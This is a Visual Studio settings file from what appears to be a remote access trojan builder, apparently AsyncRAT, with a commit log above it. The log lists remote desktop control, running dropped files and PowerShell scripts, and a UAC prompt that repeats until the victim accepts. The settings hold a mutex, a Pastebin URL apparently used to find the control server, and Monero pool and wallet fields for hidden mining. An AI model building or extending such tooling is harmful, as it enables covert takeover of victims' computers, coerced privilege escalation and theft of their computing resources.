added - remote dekstop move movements added - remote desktop showing cursor movements added - showing active window when client connected immediately updated - send file to disk will show if the file ran successfully or not fixed - send file to disk fixed when executing .ps1 file updated - UAC popup now will run until the user press accept fixed - mutex
63 lines
2.6 KiB
XML
63 lines
2.6 KiB
XML
<?xml version='1.0' encoding='utf-8'?>
|
|
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" GeneratedClassNamespace="Server.Properties" GeneratedClassName="Settings">
|
|
<Profiles />
|
|
<Settings>
|
|
<Setting Name="Ports" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="Filename" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="Notification" Type="System.Boolean" Scope="User">
|
|
<Value Profile="(Default)">True</Value>
|
|
</Setting>
|
|
<Setting Name="Mutex" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)">AsyncMutex_6SI8OkPnk</Value>
|
|
</Setting>
|
|
<Setting Name="Pastebin" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)">https://pastebin.com/raw/s14cUU5G</Value>
|
|
</Setting>
|
|
<Setting Name="IP" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="ProductName" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="txtDescription" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="txtCompany" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="txtCopyright" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="txtTrademarks" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="txtOriginalFilename" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="txtProductVersion" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)">0.0.0.0</Value>
|
|
</Setting>
|
|
<Setting Name="txtFileVersion" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)">0.0.0.0</Value>
|
|
</Setting>
|
|
<Setting Name="txtPool" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="txtWallet" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="txtxmrPass" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="txtBlocked" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)" />
|
|
</Setting>
|
|
<Setting Name="Group" Type="System.String" Scope="User">
|
|
<Value Profile="(Default)">Default</Value>
|
|
</Setting>
|
|
</Settings>
|
|
</SettingsFile> |